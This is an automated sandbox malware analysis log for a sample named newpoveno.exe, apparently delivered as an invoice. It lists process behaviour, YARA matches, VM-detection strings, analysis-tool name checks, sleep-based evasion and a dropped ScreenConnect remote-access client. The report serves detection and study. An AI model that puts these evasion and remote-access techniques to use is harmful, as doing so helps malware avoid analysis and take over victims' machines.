                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Document.exe    Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1B2AE1E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1B2AE200000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1F346150000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: 1F366150000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2EA0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 3090000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 5090000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 143E3450000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 184797D0000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 184997D0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 17D0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 31E0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 3100000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 24B50210000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 24B50230000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 28BE6770000 memory reserve | memory write watch
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: 28C06770000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 16A0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 30D0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2F10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 14E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 2DD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 65E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 5DE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 65E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 75E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeMemory allocated: 85E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMemory allocated: 1900000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMemory allocated: 1EC0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeMemory allocated: 3EC0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeMemory allocated: 1370000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 860000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 2380000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 21B0000 memory reserve | memory write watch
                            Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4866
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4833
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 586
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 9247
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 8812
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 894
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICABB.tmp
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Core.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsFileManager.exe
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC5F8.tmp
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.InstallerActions.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsAuthenticationPackage.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.Cab.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsBackstageShell.exe
                            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsCredentialProvider.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Windows.dll
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeAPI coverage: 4.0 %
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeAPI coverage: 3.8 %
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeAPI coverage: 3.8 %
                            Source: C:\Windows\System32\svchost.exe TID: 4772Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 7092Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 5312Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep count: 4866 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 4833 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5940Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7632Thread sleep time: -24903104499507879s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7588Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep count: 4872 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep count: 127 > 30
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Document.exe TID: 6964Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe TID: 7256Thread sleep count: 56 > 30
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe TID: 7088Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3024Thread sleep count: 54 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3024Thread sleep time: -540000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 7848Thread sleep count: 8812 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 7048Thread sleep count: 894 > 30
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                            Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D7D50 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,8_2_00007FFA208D7D50
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000010.00000002.6326711079.000002CA7FC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell\v(@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000003.6134213228.000002CA01290000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmci.sys
Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: svchost.exe, 00000010.00000002.6326711079.000002CA7FC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
